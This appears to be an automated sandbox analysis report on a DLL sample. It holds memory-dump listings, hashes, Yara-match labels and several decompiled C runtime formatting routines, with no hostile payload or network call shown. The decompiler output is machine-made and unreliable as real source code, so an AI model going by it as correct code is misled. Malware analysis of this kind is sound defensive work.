                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b668b39b19a5c008a811b18ffbc892ef36bff2a8882c4d50ffd345a57302695d
                                                                      • Instruction ID: 7116f99495145c24ae3106d899c67866308e3919e9d1a8719d9619277fc22a0f
                                                                      • Opcode Fuzzy Hash: b668b39b19a5c008a811b18ffbc892ef36bff2a8882c4d50ffd345a57302695d
                                                                      • Instruction Fuzzy Hash: FF41BF76204B8881E7A68F2AC0813AD3BA1F749BACF188215EF5D0B7E9CF35C585D700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4ca1efe31156c35c298be2d637e060690348a8d13e7852dc2934e068bf2ecc89
                                                                      • Instruction ID: 3cbaf2ddad705798d4975f004fb047a13f1c2456f2e0458b0a9f33b6b0dcafce
                                                                      • Opcode Fuzzy Hash: 4ca1efe31156c35c298be2d637e060690348a8d13e7852dc2934e068bf2ecc89
                                                                      • Instruction Fuzzy Hash: 9041C4B050078E8FDF48DF64C8964DE7BF1FB48348F114619EC6AAA250C7B8D664CB85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4925ee82926c03f91a1e3b482f86819beec65b60f7c6f5bf4a0d11e41f9678a5
                                                                      • Instruction ID: 974a7e82ef2565c55b1b6255b1e070ad42c0ba530058cac948d762d963b97431
                                                                      • Opcode Fuzzy Hash: 4925ee82926c03f91a1e3b482f86819beec65b60f7c6f5bf4a0d11e41f9678a5
                                                                      • Instruction Fuzzy Hash: 5031E2B0658B818BE758DF28C49551AFBE0FB84384F604A2DF596C6370DBB4D489CF46
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e266d6f6875b0741bba7e8f396aa2568130e5f5413b786f050a6d872e8f1bbf0
                                                                      • Instruction ID: 8d23e418e3efa1c2211c8c2ae9a4e3677bd1f474c2e9f7a019de3825af3197a7
                                                                      • Opcode Fuzzy Hash: e266d6f6875b0741bba7e8f396aa2568130e5f5413b786f050a6d872e8f1bbf0
                                                                      • Instruction Fuzzy Hash: B241B27090078E8BDB49CF64C88A5DE7BF0FB58348F104A19E866A6250D7B8D6A5CBC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 57c98796ed9da153abb094566a94e2ccb09f6dfb0813e54e4800ca6b7e7c1b87
                                                                      • Instruction ID: 77ee7aac4a604ab4eaa9ef9de0c7c4db185ee6a1b2bace45cb2d826a4105ee03
                                                                      • Opcode Fuzzy Hash: 57c98796ed9da153abb094566a94e2ccb09f6dfb0813e54e4800ca6b7e7c1b87
                                                                      • Instruction Fuzzy Hash: 62315B756587858B8348DF28C44942ABBE5FB8D30CF404B2DF4CAAB355D778D6058F4A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E0000000118001A098(void* __eax, long long __rbx, long long __rcx, intOrPtr* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				signed int _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t43;
                                                                      				signed int _t45;
                                                                      				intOrPtr _t58;
                                                                      				signed long long _t59;
                                                                      				intOrPtr _t62;
                                                                      				signed long long _t63;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				long long _t69;
                                                                      				signed int* _t72;
                                                                      				signed int _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t79;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x8001a0c5;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				r8d =  *(_t68 - 8) & 0x0000ffff;
                                                                      				 *__rdx = r8w;
                                                                      				goto 0x8001a192;
                                                                      				if (__eax - 0x63 <= 0) goto 0x8001a106;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t58 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t58 + 0x2c)) = 0x16;
                                                                      				_t59 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t59;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t59, __rcx, _t68, __rdx, _t74, _t75, _t79);
                                                                      				goto 0x8001a194;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x8001a184;
                                                                      				_t45 =  *(_t68 + 0x34);
                                                                      				r9b =  *(_t65 + 0x39);
                                                                      				_t72 = _t65 + (_t59 + _t59 * 2 + 0x90) * 8;
                                                                      				if ( *_t72 != 0) goto 0x8001a140;
                                                                      				 *_t72 = 1;
                                                                      				_t72[1] = r9b;
                                                                      				_t72[4] = _t45;
                                                                      				dil = 1;
                                                                      				goto 0x8001a194;
                                                                      				_v24 = _t45;
                                                                      				r8d = 1;
                                                                      				_t69 = _t65;
                                                                      				if (E000000011800245A8(_t43, _t65, _t69, _t72, _t73, _t80, _t81) != 0) goto 0x8001a138;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t62 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t62 + 0x2c)) = 0x16;
                                                                      				_t63 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t63;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t63, _t65, _t69, _t72, _t74, _t75, _t79);
                                                                      				goto 0x8001a13b;
                                                                      				 *_t72 =  *( *(_t69 + 0x488 + _t63 * 8)) & 0x0000ffff;
                                                                      				return 1;
                                                                      			}






















                                                                      0x18001a098
                                                                      0x18001a0a9
                                                                      0x18001a0ac
                                                                      0x18001a0ae
                                                                      0x18001a0b3
                                                                      0x18001a0b7
                                                                      0x18001a0bc
                                                                      0x18001a0c0
                                                                      0x18001a0cf
                                                                      0x18001a0d1
                                                                      0x18001a0d7
                                                                      0x18001a0da
                                                                      0x18001a0df
                                                                      0x18001a0e3
                                                                      0x18001a0ea
                                                                      0x18001a0f0
                                                                      0x18001a0f5
                                                                      0x18001a0fa
                                                                      0x18001a101
                                                                      0x18001a111
                                                                      0x18001a113
                                                                      0x18001a11d
                                                                      0x18001a121
                                                                      0x18001a129
                                                                      0x18001a12b
                                                                      0x18001a131
                                                                      0x18001a135
                                                                      0x18001a138
                                                                      0x18001a13e
                                                                      0x18001a140
                                                                      0x18001a144
                                                                      0x18001a14a
                                                                      0x18001a154
                                                                      0x18001a156
                                                                      0x18001a15a
                                                                      0x18001a15d
                                                                      0x18001a164
                                                                      0x18001a168
                                                                      0x18001a16f
                                                                      0x18001a173
                                                                      0x18001a178
                                                                      0x18001a17d
                                                                      0x18001a182
                                                                      0x18001a18f
                                                                      0x18001a19e

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 077f3aff6a53c3673b78d5ba69e8f8e4682316bba1353c0c616dc6c4d0aba232
                                                                      • Instruction ID: 49eb1ae5f09e1f07836a4ba45efd9eaea9e43899819bb928a697fc02e1ca6435
                                                                      • Opcode Fuzzy Hash: 077f3aff6a53c3673b78d5ba69e8f8e4682316bba1353c0c616dc6c4d0aba232
                                                                      • Instruction Fuzzy Hash: C131C272208B9496EB628F29D4403AD7BA0F38DB9CF248115EB8C4B351DF3AC596CB00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E000000011800180E0(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long __r8, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				signed long long _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t43;
                                                                      				signed long long _t45;
                                                                      				intOrPtr _t58;
                                                                      				signed long long _t59;
                                                                      				intOrPtr _t62;
                                                                      				signed long long _t63;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				signed long long* _t72;
                                                                      				signed long long _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_t79 = __r8;
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x8001810b;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				r8d =  *(_t68 - 8);
                                                                      				 *__rdx = __r8;
                                                                      				goto 0x800181d7;
                                                                      				if (__eax - 0x63 <= 0) goto 0x8001814c;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t58 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t58 + 0x2c)) = 0x16;
                                                                      				_t59 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t59;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t59, __rcx, _t68, __rdx, _t74, _t75, __r8);
                                                                      				goto 0x800181d9;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x800181ca;
                                                                      				_t45 =  *(_t68 + 0x34);
                                                                      				r9b =  *(_t65 + 0x39);
                                                                      				_t72 = _t65 + (_t59 + _t59 * 2 + 0x90) * 8;
                                                                      				if ( *_t72 != 0) goto 0x80018186;
                                                                      				 *_t72 = 1;
                                                                      				_t72[0] = r9b;
                                                                      				_t72[2] = _t45;
                                                                      				dil = 1;
                                                                      				goto 0x800181d9;
                                                                      				_v24 = _t45;
                                                                      				r8d = 1;
                                                                      				if (E000000011800245A8(_t43, _t65, _t65, _t72, _t73, _t80, _t81) != 0) goto 0x8001817e;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t62 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t62 + 0x2c)) = 0x16;
                                                                      				_t63 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t63;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t63, _t65, _t65, _t72, _t74, _t75, _t79);
                                                                      				goto 0x80018181;
                                                                      				 *_t72 = _t63;
                                                                      				return 1;
                                                                      			}




















                                                                      0x1800180e0
                                                                      0x1800180e0
                                                                      0x1800180f1
                                                                      0x1800180f4
                                                                      0x1800180f6
                                                                      0x1800180fb
                                                                      0x1800180ff
                                                                      0x180018103
                                                                      0x180018106
                                                                      0x180018115
                                                                      0x180018117
                                                                      0x18001811d
                                                                      0x180018120
                                                                      0x180018125
                                                                      0x180018129
                                                                      0x180018130
                                                                      0x180018136
                                                                      0x18001813b
                                                                      0x180018140
                                                                      0x180018147
                                                                      0x180018157
                                                                      0x180018159
                                                                      0x180018163
                                                                      0x180018167
                                                                      0x18001816f
                                                                      0x180018171
                                                                      0x180018177
                                                                      0x18001817b
                                                                      0x18001817e
                                                                      0x180018184
                                                                      0x180018186
                                                                      0x18001818a
                                                                      0x18001819a
                                                                      0x18001819c
                                                                      0x1800181a0
                                                                      0x1800181a3
                                                                      0x1800181aa
                                                                      0x1800181ae
                                                                      0x1800181b5
                                                                      0x1800181b9
                                                                      0x1800181be
                                                                      0x1800181c3
                                                                      0x1800181c8
                                                                      0x1800181d4
                                                                      0x1800181e3

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: eb97b135a315b0fe211809f36c6cdad0cb0c5c5859d3d66a78e3183fb93a32d2
                                                                      • Instruction ID: 0a380792443759b80787c846ee3bc9aaed0e8e069f867f3fd6054a20c4d7c7e1
                                                                      • Opcode Fuzzy Hash: eb97b135a315b0fe211809f36c6cdad0cb0c5c5859d3d66a78e3183fb93a32d2
                                                                      • Instruction Fuzzy Hash: 9D318F73204B9896DB658F29D4403AD7BA4F79DB8CF248129EB8C4B751CF36C696DB00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E0000000118001A1A0(void* __eax, long long __rbx, long long __rcx, intOrPtr* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				signed int _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t43;
                                                                      				signed int _t45;
                                                                      				intOrPtr _t58;
                                                                      				signed long long _t59;
                                                                      				intOrPtr _t62;
                                                                      				signed long long _t63;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				long long _t69;
                                                                      				signed int* _t72;
                                                                      				signed int _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t79;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x8001a1cd;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				r8d =  *(_t68 - 8) & 0x0000ffff;
                                                                      				 *__rdx = r8w;
                                                                      				goto 0x8001a29a;
                                                                      				if (__eax - 0x63 <= 0) goto 0x8001a20e;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t58 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t58 + 0x2c)) = 0x16;
                                                                      				_t59 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t59;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t59, __rcx, _t68, __rdx, _t74, _t75, _t79);
                                                                      				goto 0x8001a29c;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x8001a28c;
                                                                      				_t45 =  *(_t68 + 0x34);
                                                                      				r9b =  *(_t65 + 0x39);
                                                                      				_t72 = _t65 + (_t59 + _t59 * 2 + 0x90) * 8;
                                                                      				if ( *_t72 != 0) goto 0x8001a248;
                                                                      				 *_t72 = 1;
                                                                      				_t72[1] = r9b;
                                                                      				_t72[4] = _t45;
                                                                      				dil = 1;
                                                                      				goto 0x8001a29c;
                                                                      				_v24 = _t45;
                                                                      				r8d = 1;
                                                                      				_t69 = _t65;
                                                                      				if (E000000011800247DC(_t43, _t65, _t69, _t72, _t73, _t80, _t81) != 0) goto 0x8001a240;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t62 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t62 + 0x2c)) = 0x16;
                                                                      				_t63 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t63;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t63, _t65, _t69, _t72, _t74, _t75, _t79);
                                                                      				goto 0x8001a243;
                                                                      				 *_t72 =  *( *(_t69 + 0x488 + _t63 * 8)) & 0x0000ffff;
                                                                      				return 1;
                                                                      			}






















                                                                      0x18001a1a0
                                                                      0x18001a1b1
                                                                      0x18001a1b4
                                                                      0x18001a1b6
                                                                      0x18001a1bb
                                                                      0x18001a1bf
                                                                      0x18001a1c4
                                                                      0x18001a1c8
                                                                      0x18001a1d7
                                                                      0x18001a1d9
                                                                      0x18001a1df
                                                                      0x18001a1e2
                                                                      0x18001a1e7
                                                                      0x18001a1eb
                                                                      0x18001a1f2
                                                                      0x18001a1f8
                                                                      0x18001a1fd
                                                                      0x18001a202
                                                                      0x18001a209
                                                                      0x18001a219
                                                                      0x18001a21b
                                                                      0x18001a225
                                                                      0x18001a229
                                                                      0x18001a231
                                                                      0x18001a233
                                                                      0x18001a239
                                                                      0x18001a23d
                                                                      0x18001a240
                                                                      0x18001a246
                                                                      0x18001a248
                                                                      0x18001a24c
                                                                      0x18001a252
                                                                      0x18001a25c
                                                                      0x18001a25e
                                                                      0x18001a262
                                                                      0x18001a265
                                                                      0x18001a26c
                                                                      0x18001a270
                                                                      0x18001a277
                                                                      0x18001a27b
                                                                      0x18001a280
                                                                      0x18001a285
                                                                      0x18001a28a
                                                                      0x18001a297
                                                                      0x18001a2a6

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a6c7f1b1129227a4152f7eda820c4deddf121ae233390d670c7aa572271755ad
                                                                      • Instruction ID: 4e5799305e5084541d7159adaab092abd5f203c88e0685a598ad4f6173234d0c
                                                                      • Opcode Fuzzy Hash: a6c7f1b1129227a4152f7eda820c4deddf121ae233390d670c7aa572271755ad
                                                                      • Instruction Fuzzy Hash: B6319172218B9886EBA28F29D0403AD7BA0E39DF8CF248115EB4C4B751CF36C596CB04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E000000011800181E4(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long __r8, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				signed long long _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t43;
                                                                      				signed long long _t45;
                                                                      				intOrPtr _t58;
                                                                      				signed long long _t59;
                                                                      				intOrPtr _t62;
                                                                      				signed long long _t63;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				signed long long* _t72;
                                                                      				signed long long _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_t79 = __r8;
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x8001820f;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				r8d =  *(_t68 - 8);
                                                                      				 *__rdx = __r8;
                                                                      				goto 0x800182db;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80018250;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t58 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t58 + 0x2c)) = 0x16;
                                                                      				_t59 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t59;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t59, __rcx, _t68, __rdx, _t74, _t75, __r8);
                                                                      				goto 0x800182dd;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x800182ce;
                                                                      				_t45 =  *(_t68 + 0x34);
                                                                      				r9b =  *(_t65 + 0x39);
                                                                      				_t72 = _t65 + (_t59 + _t59 * 2 + 0x90) * 8;
                                                                      				if ( *_t72 != 0) goto 0x8001828a;
                                                                      				 *_t72 = 1;
                                                                      				_t72[0] = r9b;
                                                                      				_t72[2] = _t45;
                                                                      				dil = 1;
                                                                      				goto 0x800182dd;
                                                                      				_v24 = _t45;
                                                                      				r8d = 1;
                                                                      				if (E000000011800247DC(_t43, _t65, _t65, _t72, _t73, _t80, _t81) != 0) goto 0x80018282;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t62 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t62 + 0x2c)) = 0x16;
                                                                      				_t63 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t63;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t63, _t65, _t65, _t72, _t74, _t75, _t79);
                                                                      				goto 0x80018285;
                                                                      				 *_t72 = _t63;
                                                                      				return 1;
                                                                      			}




















                                                                      0x1800181e4
                                                                      0x1800181e4
                                                                      0x1800181f5
                                                                      0x1800181f8
                                                                      0x1800181fa
                                                                      0x1800181ff
                                                                      0x180018203
                                                                      0x180018207
                                                                      0x18001820a
                                                                      0x180018219
                                                                      0x18001821b
                                                                      0x180018221
                                                                      0x180018224
                                                                      0x180018229
                                                                      0x18001822d
                                                                      0x180018234
                                                                      0x18001823a
                                                                      0x18001823f
                                                                      0x180018244
                                                                      0x18001824b
                                                                      0x18001825b
                                                                      0x18001825d
                                                                      0x180018267
                                                                      0x18001826b
                                                                      0x180018273
                                                                      0x180018275
                                                                      0x18001827b
                                                                      0x18001827f
                                                                      0x180018282
                                                                      0x180018288
                                                                      0x18001828a
                                                                      0x18001828e
                                                                      0x18001829e
                                                                      0x1800182a0
                                                                      0x1800182a4
                                                                      0x1800182a7
                                                                      0x1800182ae
                                                                      0x1800182b2
                                                                      0x1800182b9
                                                                      0x1800182bd
                                                                      0x1800182c2
                                                                      0x1800182c7
                                                                      0x1800182cc
                                                                      0x1800182d8
                                                                      0x1800182e7

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a292be2d75a9594566bcf78c629e301164523910fb1b26a3913015135b1e3331
                                                                      • Instruction ID: 22204c7159014ea0372674f9054289992822a3e11217a0e77a77c18a8f017754
                                                                      • Opcode Fuzzy Hash: a292be2d75a9594566bcf78c629e301164523910fb1b26a3913015135b1e3331
                                                                      • Instruction Fuzzy Hash: D8316172214F8886DBA28F69D0503AD7BA0F79DB8CF248115EB4D4B755CF36C696DB00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 49%
                                                                      			E0000000118001A2A8(void* __eax, long long __rbx, long long __rcx, intOrPtr* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				signed int _v24;
                                                                      				signed int _t44;
                                                                      				intOrPtr _t57;
                                                                      				signed long long _t58;
                                                                      				intOrPtr _t61;
                                                                      				signed long long _t62;
                                                                      				long long _t64;
                                                                      				intOrPtr _t67;
                                                                      				intOrPtr* _t68;
                                                                      				signed int* _t71;
                                                                      				signed int _t72;
                                                                      				void* _t73;
                                                                      				void* _t74;
                                                                      				void* _t78;
                                                                      				void* _t79;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t64 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x8001a2d5;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t67 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				r8d =  *(_t67 - 8) & 0x0000ffff;
                                                                      				 *__rdx = r8w;
                                                                      				goto 0x8001a3a4;
                                                                      				if (__eax - 0x63 <= 0) goto 0x8001a316;
                                                                      				_t57 =  *((intOrPtr*)(_t67 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t57 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t57 + 0x2c)) = 0x16;
                                                                      				_t58 =  *((intOrPtr*)(_t67 + 8));
                                                                      				_v16 = _t58;
                                                                      				_v24 = _t72;
                                                                      				E00000001180013858(_t58, __rcx, _t67, __rdx, _t73, _t74, _t78);
                                                                      				goto 0x8001a3a6;
                                                                      				if ( *((intOrPtr*)(_t67 + 0x470)) != 1) goto 0x8001a396;
                                                                      				_t44 =  *(_t67 + 0x34);
                                                                      				r9d =  *(_t64 + 0x3a) & 0x0000ffff;
                                                                      				_t71 = _t64 + (_t58 + _t58 * 2 + 0x90) * 8;
                                                                      				if ( *_t71 != 0) goto 0x8001a352;
                                                                      				 *_t71 = 1;
                                                                      				_t71[1] = r9w;
                                                                      				_t71[4] = _t44;
                                                                      				dil = 1;
                                                                      				goto 0x8001a3a6;
                                                                      				_v24 = _t44;
                                                                      				r8d = 1;
                                                                      				_t68 = _t64;
                                                                      				if (E00000001180024A10(_t64, _t68, _t71, _t73, _t79) != 0) goto 0x8001a34a;
                                                                      				_t61 =  *((intOrPtr*)(_t64 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t61 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t61 + 0x2c)) = 0x16;
                                                                      				_t62 =  *((intOrPtr*)(_t64 + 8));
                                                                      				_v16 = _t62;
                                                                      				_v24 = _t72;
